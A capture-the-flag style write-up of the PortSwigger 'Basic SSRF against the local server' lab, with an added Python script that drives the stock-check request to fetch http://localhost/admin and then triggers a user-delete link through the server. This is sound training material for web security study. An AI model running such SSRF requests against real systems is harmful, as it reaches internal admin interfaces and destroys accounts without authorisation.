Lab: Basic SSRF against the local server

This lab has a stock check feature which fetches data from an internal system. To solve the lab, change the stock check URL so that it accesses the admin interface at http://localhost/admin, then delete the user carlos.

Here we have the main page

Then open a product and use the stock check at the bottom of the page.

When the user checks the stock, the request is as follows:

All you have to do is replace the URL in that request with the one given in the exercise statement, http://localhost/admin:

The response is the admin panel. From there you can delete the user "carlos", as the exercise statement asks. Note that the admin interface is only reachable from the server itself, so the delete link shown in the panel also has to be sent through the stock check (prefixed with http://localhost) rather than opened directly in the browser.
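The same two steps scripted, as an added example that is not part of the original write-up. The page does not show the stock-check request itself, so the endpoint (/product/stock), the form field that carries the URL (stockApi) and the shape of the admin page's delete links (/admin/delete?username=...) are assumptions; read the real values out of the intercepted request and response before using it.

```python
"""Added example (not from the original write-up): drive the stock-check SSRF
from a script instead of Burp Repeater.

Assumed, because the page does not show them: the stock check is a POST to
/product/stock whose form field `stockApi` holds the URL the server fetches, and
the admin page exposes delete links of the form /admin/delete?username=<name>.
Read the real endpoint, parameter and link out of the intercepted traffic."""
import html
import re
import sys
from typing import Optional
from urllib.parse import parse_qs, urlencode, urljoin, urlparse
from urllib.request import Request, urlopen

STOCK_ENDPOINT = "/product/stock"   # assumed path of the stock-check request
STOCK_PARAM = "stockApi"            # assumed name of the field holding the URL
INTERNAL_BASE = "http://localhost"  # the host the lab asks us to reach via SSRF


def build_stock_check_body(target_url: str) -> str:
    """Form body that makes the back end fetch target_url instead of the stock API."""
    return urlencode({STOCK_PARAM: target_url})


def find_delete_link(page_html: str, username: str) -> Optional[str]:
    """Return the absolute URL of the link that deletes `username`, or None.

    The admin page is fetched by the server from localhost, so a relative href
    in it must be resolved against INTERNAL_BASE, not against the lab host."""
    for href in re.findall(r'href="([^"]+)"', page_html):
        href = html.unescape(href)
        parts = urlparse(href)
        if parts.path.endswith("/delete") and parse_qs(parts.query).get("username") == [username]:
            return urljoin(INTERNAL_BASE, href)
    return None


def ssrf_fetch(lab_base: str, target_url: str, timeout: float = 10.0) -> str:
    """Ask the lab server to fetch target_url on our behalf and return the body."""
    req = Request(
        urljoin(lab_base, STOCK_ENDPOINT),
        data=build_stock_check_body(target_url).encode(),
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        method="POST",
    )
    with urlopen(req, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


def delete_user_via_ssrf(lab_base: str, username: str) -> str:
    """Two SSRF round trips: read the admin page, then trigger its delete link."""
    admin_html = ssrf_fetch(lab_base, f"{INTERNAL_BASE}/admin")
    delete_url = find_delete_link(admin_html, username)
    if delete_url is None:
        raise RuntimeError(f"no delete link for {username!r} in the admin page")
    ssrf_fetch(lab_base, delete_url)  # the delete link must also go via localhost
    return delete_url


# Constructed sample of what the admin page might contain; the real markup differs.
SAMPLE_ADMIN_HTML = """
<h1>Users</h1>
<span>wiener - <a href="/admin/delete?username=wiener">Delete</a></span>
<span>carlos - <a href="/admin/delete?username=carlos">Delete</a></span>
"""

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("usage: python ssrf_admin.py https://<lab-id>.web-security-academy.net")
        sys.exit(1)
    print("triggered", delete_user_via_ssrf(sys.argv[1].rstrip("/"), "carlos"))
```

Run it with the lab's base URL as the only argument. The point worth keeping from the script is the second round trip: the delete link found in the admin page is resolved against http://localhost and sent through the stock check again, because the admin interface is not reachable from the browser directly.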
